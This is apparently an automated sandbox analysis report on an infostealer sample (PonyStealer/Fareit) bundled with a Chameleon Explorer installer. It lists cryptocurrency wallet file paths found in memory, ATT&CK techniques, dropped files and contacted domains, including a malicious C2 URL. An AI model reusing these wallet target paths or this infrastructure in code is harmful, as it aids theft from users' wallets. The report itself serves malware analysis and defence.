                      Source: Yara matchFile source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: update.exe PID: 688, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: update.exe PID: 4760, type: MEMORYSTR
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: electrum.dat
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Coins\Exodus
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Coins\Ethereum
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      31
                      Input Capture
                      1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium3
                      Ingress Tool Transfer
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts1
                      Native API
                      1
                      Scheduled Task/Job
                      112
                      Process Injection
                      2
                      Obfuscated Files or Information
                      LSASS Memory3
                      File and Directory Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      Exfiltration Over Bluetooth11
                      Encrypted Channel
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter
                      111
                      Registry Run Keys / Startup Folder
                      1
                      Scheduled Task/Job
                      12
                      Software Packing
                      Security Account Manager135
                      System Information Discovery
                      SMB/Windows Admin Shares31
                      Input Capture
                      Automated Exfiltration4
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local Accounts1
                      Scheduled Task/Job
                      Logon Script (Mac)111
                      Registry Run Keys / Startup Folder
                      1
                      DLL Side-Loading
                      NTDS1
                      Query Registry
                      Distributed Component Object ModelInput CaptureScheduled Transfer15
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script12
                      Masquerading
                      LSA Secrets331
                      Security Software Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials1
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items112
                      Process Injection
                      DCSync2
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                      Application Window Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow2
                      System Owner/User Discovery
                      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      Remote System Discovery
                      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
                      System Network Configuration Discovery
                      Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      [Behavior graph. Behavior Graph ID: 813135; Sample: B7CFD1D0AAD8B5D5DB5C17DA051...; Startdate: 22/02/2023; Architecture: WINDOWS; Score: 100]

                      Source | Detection | Scanner | Label | Link
                      B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe | 71% | Virustotal | | Browse
                      B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe | 77% | ReversingLabs | Win32.Infostealer.PonyStealer |
                      B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe | 100% | Avira | TR/Dropper.VB.yedon |
                      Source | Detection | Scanner | Label | Link
                      C:\Users\user\AppData\Roaming\update.exe | 100% | Avira | HEUR/AGEN.1225881 |
                      C:\Users\user\AppData\Roaming\update.exe | 100% | Joe Sandbox ML | |
                      C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy) | 0% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy) | 2% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy) | 0% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy) | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll | 0% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup | 0% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy) | 0% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\Folder.dll | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backup | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\Folder.dll_new (copy) | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\Folder64.dll | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backup | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_new (copy) | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\is-4Q1I9.tmp | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\is-5C20L.tmp | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\is-7RNBS.tmp | 0% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\is-89A92.tmp | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\is-EV8UG.tmp | 2% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\is-FAU52.tmp | 3% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\is-HQP5N.tmp | 0% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\is-LI6V8.tmp | 0% | ReversingLabs | |
                      C:\Program Files (x86)\Chameleon Explorer\unins000.exe (copy) | 3% | ReversingLabs | |
                      C:\Users\user\AppData\Local\Temp\autEDA4.tmp | 2% | ReversingLabs | |
                      C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp | 3% | ReversingLabs | |
                      C:\Users\user\AppData\Local\Temp\is-V4HOF.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
                      C:\Users\user\AppData\Roaming\cexplorer.exe | 2% | ReversingLabs | |
                      C:\Users\user\AppData\Roaming\update.exe | 80% | ReversingLabs | Win32.Infostealer.Fareit |
                      Source | Detection | Scanner | Label | Link | Download
                      0.0.B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe.df0000.0.unpack | 100% | Avira | HEUR/AGEN.1225881 | | Download File
                      20.2.update.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1232827 | | Download File
                      20.2.update.exe.29b6000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
                      3.2.update.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1225881 | | Download File
                      0.2.B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe.df0000.0.unpack | 100% | Avira | HEUR/AGEN.1225881 | | Download File
                      20.0.update.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1225881 | | Download File
                      3.0.update.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1225881 | | Download File
                      Source | Detection | Scanner | Label | Link
                      2no.co | 4% | Virustotal | | Browse
                      ghs.googlehosted.com | 0% | Virustotal | | Browse
                      neosoft-activator.appspot.com | 0% | Virustotal | | Browse
                      www.chameleon-managers.com | 0% | Virustotal | | Browse
                      Source | Detection | Scanner | Label | Link
                      https://dotbit.me/a/ | 0% | URL Reputation | safe |
                      https://dotbit.me/a/ | 0% | URL Reputation | safe |
                      http://crl.startssl.com/sfsca.crl0f | 0% | URL Reputation | safe |
                      http://www.palkornel.hu/innosetup%1 | 0% | URL Reputation | safe |
                      http://www.innosetup.com/ | 0% | URL Reputation | safe |
                      http://www.startssl.com/policy0 | 0% | URL Reputation | safe |
                      http://counter-strike.com.ua/ | 0% | URL Reputation | safe |
                      http://ocsp.thawte.com0 | 0% | URL Reputation | safe |
                      http://ocsp.startssl.com07 | 0% | URL Reputation | safe |
                      http://ocsp.startssl.com00 | 0% | URL Reputation | safe |
                      http://www.dk-soft.org/ | 0% | URL Reputation | safe |
                      https://wl.gl/tg | 0% | Avira URL Cloud | safe |
                      https://counter.yadro.ru/hit? | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.comQN( | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3& | 0% | Avira URL Cloud | safe |
                      http://aia.startssl.com/certs/sca.code2.crt06 | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3_lmPlmP | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com/subscription/?action=latest&key= | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.comsK | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3j | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3l | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3h | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3c | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com/contacts.php?utm_source=program&utm_medium=question&utm_campaign= | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3g | 0% | Avira URL Cloud | safe |
                      https://wl.gl/app | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3f | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3 | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3d | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3e | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.comSQ | 0% | Avira URL Cloud | safe |
                      http://www.startssl.com/0Q | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3V$mP$mP | 0% | Avira URL Cloud | safe |
                      https://2no.co/ | 0% | Avira URL Cloud | safe |
                      https://neosoft-activator.appspot.com/ | 0% | Avira URL Cloud | safe |
                      https://2no.co/1dHC37 | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.comc | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com/subscription/?action=extend&key= | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.coms | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com/info/versions/ | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.comBhttp://www.chameleon-managers.comBhttp://www.chameleon-managers.co | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com/reg.php?program= | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.comH | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3t | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com/contacts.php?program= | 0% | Avira URL Cloud | safe |
                      http://www.chameleon-managers.com3Y4=A4=AhXInno | 0% | Avira URL Cloud | safe |
                      http://crl.startssl.com/sca-code2.crl0# | 0% | Avira URL Cloud | safe |
                      http://51.15.219.86/1/index.php | 0% | Avira URL Cloud | safe |
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      2no.co | 148.251.234.93 | true | false | | unknown
                      iplogger.org | 148.251.234.83 | true | false | | high
                      ghs.googlehosted.com | 142.250.180.147 | true | false | | unknown
                      neosoft-activator.appspot.com | 142.250.184.84 | true | false | | unknown
                      www.chameleon-managers.com | unknown | unknown | true | | unknown
                      Name | Malicious | Antivirus Detection | Reputation
                      https://iplogger.org/unknown/2no.co/1dHC37/unknown | false | | high
                      https://2no.co/1dHC37 | false | Avira URL Cloud: safe | unknown
                      http://www.chameleon-managers.com/info/versions/ | false | Avira URL Cloud: safe | unknown
                      http://51.15.219.86/1/index.php | true | Avira URL Cloud: safe | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                                                                    high
                                                                    https://cdn.iplogger.org/logo/76.pngB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cdn.iplogger.org/icons/tools_14.svgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.chameleon-managers.com3fcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.chameleon-managers.com3gcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://wl.gl/appB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.chameleon-managers.com3cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.chameleon-managers.com3dcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://cdn.iplogger.org/icons/tools_6.svgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.chameleon-managers.com3ecexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.chameleon-managers.comSQcexplorer.exe, 00000001.00000003.401105982.00000000021B6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://help.iplogger.org/?a=add&amp;category=2B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://iplogger.org/AB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337052630.00000000048D3000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.342430878.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384294738.00000000048D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.startssl.com/0Qcexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://help.iplogger.org/knowledgebase.php?categorB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.chameleon-managers.com3V$mP$mPcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                low
                                                                                https://2no.co/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cdn.iplogger.org/icons/tools_4.svgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.iplogger.orgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.iplogger.org/css/ui.css?1.6.5B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.341900719.0000000004919000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://neosoft-activator.appspot.com/ChameleonExplorer.exe, 00000006.00000002.326211855.000000000152C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://iplogger.org/shortener/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUcexplorer.exe, 00000001.00000000.266649495.0000000000401000.00000020.00000001.01000000.00000004.sdmpfalse
                                                                                          high
                                                                                          https://iplogger.org/ip-services/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://ip-api.com/jsonupdate.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.chameleon-managers.comccexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://iplogger.org/unknown/2no.co/1dHC37/unknownLocationETagAuthentication-InfoAgeAccept-RangesLasB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337029009.0000000004913000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004909000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.000000000490C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://iplogger.org/1nFPF4.pngB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340289325.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://iplogger.org/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384294738.00000000048D9000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337052630.00000000048D3000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.342430878.00000000048D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://iplogger.org/url-checker/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.chameleon-managers.com/subscription/?action=extend&key=ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.chameleon-managers.comscexplorer.exe, 00000001.00000003.401105982.00000000021B6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://schema.orgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.341900719.0000000004919000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://cdn.iplogger.org/icons/tools_1.svgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.chameleon-managers.comBhttp://www.chameleon-managers.comBhttp://www.chameleon-managers.cocexplorer.exe, 00000001.00000003.266890052.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.268710353.0000000003250000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://crl.thawte.com/ThawteTimestampingCA.crl0cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drfalse
                                                                                                            high
                                                                                                            http://www.chameleon-managers.com/reg.php?program=ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.chameleon-managers.comHChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
